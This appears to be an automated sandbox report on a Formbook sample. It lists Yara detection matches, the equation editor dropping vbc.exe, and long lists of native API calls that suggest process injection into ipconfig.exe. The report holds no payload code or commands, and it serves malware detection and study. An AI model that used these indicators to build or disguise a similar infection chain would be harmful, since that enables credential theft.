      Source: Yara match | File source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, type: MEMORY

      System Summary:

      Malicious sample detected (through community Yara rule)
      Source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Office equation editor drops PE file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
      .NET source code contains very large strings
      Source: vbc[1].exe.4.dr, Forms/mainForm.cs | Long String: Length: 38272
      Source: vbc.exe.4.dr, Forms/mainForm.cs | Long String: Length: 38272
      Source: 6.0.vbc.exe.200000.0.unpack, Forms/mainForm.cs | Long String: Length: 38272
      Source: 6.2.vbc.exe.200000.0.unpack, Forms/mainForm.cs | Long String: Length: 38272
      Source: 7.2.vbc.exe.200000.0.unpack, Forms/mainForm.cs | Long String: Length: 38272
      Source: 7.0.vbc.exe.200000.0.unpack, Forms/mainForm.cs | Long String: Length: 38272
      Source: 8.2.vbc.exe.200000.1.unpack, Forms/mainForm.cs | Long String: Length: 38272
      Source: 8.0.vbc.exe.200000.0.unpack, Forms/mainForm.cs | Long String: Length: 38272
      Source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: C:\Users\Public\vbc.exe | Code function: 6_2_001E3070
      Source: C:\Users\Public\vbc.exe | Code function: 6_2_001E009C
      Source: C:\Users\Public\vbc.exe | Code function: 6_2_001E1121
      Source: C:\Users\Public\vbc.exe | Code function: 6_2_001E1B00
      Source: C:\Users\Public\vbc.exe | Code function: 6_2_001E3C28
      Source: C:\Users\Public\vbc.exe | Code function: 6_2_001E44A0
      Source: C:\Users\Public\vbc.exe | Code function: 6_2_001E5D90
      Source: C:\Users\Public\vbc.exe | Code function: 6_2_001E4EF1
      Source: C:\Users\Public\vbc.exe | Code function: 6_2_001E1700
      Source: C:\Users\Public\vbc.exe | Code function: 6_2_001E68A8
      Source: C:\Users\Public\vbc.exe | Code function: 6_2_001E8210
      Source: C:\Users\Public\vbc.exe | Code function: 6_2_001E8200
      Source: C:\Users\Public\vbc.exe | Code function: 6_2_001EC2C7
      Source: C:\Users\Public\vbc.exe | Code function: 6_2_001E6B9A
      Source: C:\Users\Public\vbc.exe | Code function: 6_2_001E3B88
      Source: C:\Users\Public\vbc.exe | Code function: 6_2_001E13B0
      Source: C:\Users\Public\vbc.exe | Code function: 6_2_001E6BA8
      Source: C:\Users\Public\vbc.exe | Code function: 6_2_001E83E0
      Source: C:\Users\Public\vbc.exe | Code function: 6_2_001EAC0A
      Source: C:\Users\Public\vbc.exe | Code function: 6_2_001E5CA9
      Source: C:\Users\Public\vbc.exe | Code function: 6_2_001E04E1
      Source: C:\Users\Public\vbc.exe | Code function: 6_2_001E7D38
      Source: C:\Users\Public\vbc.exe | Code function: 6_2_001E7D48
      Source: C:\Users\Public\vbc.exe | Code function: 6_2_001EB5D0
      Source: C:\Users\Public\vbc.exe | Code function: 6_2_001EAF31
      Source: C:\Users\Public\vbc.exe | Code function: 6_2_001EA748
      Source: C:\Users\Public\vbc.exe | Code function: 6_2_001EAF40
      Source: C:\Users\Public\vbc.exe | Code function: 6_2_001E7F80
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00401030
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_0041B8D6
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_0041C2CA
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_0041CB5C
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00408C5D
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00408C60
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_0041C51E
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00402D87
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00402D90
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_0041B6D3
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00402FB0
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00A7E0C6
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00AAD005
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00A83040
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00A9905A
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00A7E2E9
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00B21238
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00A7F3CF
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00AA63DB
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00A82305
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00ACA37B
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00A87353
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00A91489
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00AB5485
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00A9C5F0
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00A8351F
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00A84680
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00A8E6C1
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00B22622
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00A8C7BC
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00B0579A
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00AB57C3
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00B1F8EE
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00AA286D
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00A8C85C
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00A829B2
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00B2098E
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00A969FE
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00B05955
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00B33A83
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00B2CBA4
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00B0DBDA
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00A7FBD7
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00AA7B00
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00B1FDDD
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00AB0D3B
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00A8CD5B
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00AB2E2F
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00A9EE4C
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00A90F3F
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00AADF7C
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_01F4E0C6
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_01F6905A
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_01F53040
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_01F7D005
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_01F763DB
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_01F4F3CF
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_01F9A37B
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_01F57353
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_01F52305
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_01F4E2E9
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_01FF1238
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_01F6C5F0
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_01F5351F
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_01F85485
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_01F61489
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_01F8D47D
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_01F857C3
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_01F5C7BC
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_01FD579A
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_01F5E6C1
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_01F54680
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_01FF2622
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_01F669FE
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_01F529B2
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_01FF098E
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_02003A83
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_01FD5955
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_01FEF8EE
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_01F7286D
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_01F5C85C
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_01F4FBD7
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_01FDDBDA
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_01FFCBA4
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_01F77B00
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_01FEFDDD
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_01F5CD5B
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_01F80D3B
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_01F7DF7C
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_01F60F3F
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_01F6EE4C
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_01F82E2F
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_000DC2CA
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_000DC51E
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_000DB6D3
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_000DB8D6
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_000DCB5C
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_000C8C5D
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_000C8C60
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_000C2D87
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 11_2_000C2D90
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: String function: 01F4DF5C appears 107 times
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: String function: 01FBF970 appears 81 times
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: String function: 01F93F92 appears 108 times
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: String function: 01F9373B appears 238 times
      Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: String function: 01F4E2A8 appears 38 times
      Source: C:\Users\Public\vbc.exe | Code function: String function: 00A7E2A8 appears 38 times
      Source: C:\Users\Public\vbc.exe | Code function: String function: 00A7DF5C appears 107 times
      Source: C:\Users\Public\vbc.exe | Code function: String function: 00AEF970 appears 81 times
      Source: C:\Users\Public\vbc.exe | Code function: String function: 00AC373B appears 238 times
      Source: C:\Users\Public\vbc.exe | Code function: String function: 00AC3F92 appears 108 times
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_004181C0 NtCreateFile,
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00418270 NtReadFile,
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_004182F0 NtClose,
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_004183A0 NtAllocateVirtualMemory,
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_0041839A NtAllocateVirtualMemory,
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00A700C4 NtCreateFile,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00A70078 NtResumeThread,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00A70048 NtProtectVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00A707AC NtCreateMutant,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00A6F9F0 NtClose,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00A6F900 NtReadFile,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exe | Code function: 8_2_00A6FAE8 NtQueryInformationProcess,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FBB8 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FB68 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FC90 NtUnmapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FC60 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FD8C NtDelayExecution,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FDC0 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FEA0 NtReadVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FFB4 NtCreateSection,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A710D0 NtOpenProcessToken,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A70060 NtQuerySection,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A701D4 NtSetValueKey,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A7010C NtOpenDirectoryObject,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A71148 NtOpenThread,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6F8CC NtWaitForSingleObject,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A71930 NtSetContextThread,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6F938 NtWriteFile,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FAB8 NtQueryValueKey,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FA20 NtQueryInformationFile,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FA50 NtEnumerateValueKey,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FBE8 NtQueryVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FB50 NtCreateKey,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FC30 NtOpenProcess,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A70C40 NtGetContextThread,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FC48 NtSetInformationFile,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A71D80 NtSuspendThread,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FD5C NtEnumerateKey,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FE24 NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FFFC NtCreateProcessEx,
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A6FF34 NtQueueApcThread,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F400C4 NtCreateFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F407AC NtCreateMutant,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3F9F0 NtClose,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3F900 NtReadFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FBB8 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FB68 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FB50 NtCreateKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FAE8 NtQueryInformationProcess,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FDC0 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FD8C NtDelayExecution,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FC60 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FFB4 NtCreateSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F401D4 NtSetValueKey,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F41148 NtOpenThread,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F4010C NtOpenDirectoryObject,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F410D0 NtOpenProcessToken,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F40078 NtResumeThread,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F40060 NtQuerySection,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F40048 NtProtectVirtualMemory,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F41930 NtSetContextThread,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3F938 NtWriteFile,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3F8CC NtWaitForSingleObject,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FBE8 NtQueryVirtualMemory,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FAD0 NtAllocateVirtualMemory,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FAB8 NtQueryValueKey,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FA50 NtEnumerateValueKey,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F3FA20 NtQueryInformationFile,
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F41D80 NtSuspendThread,
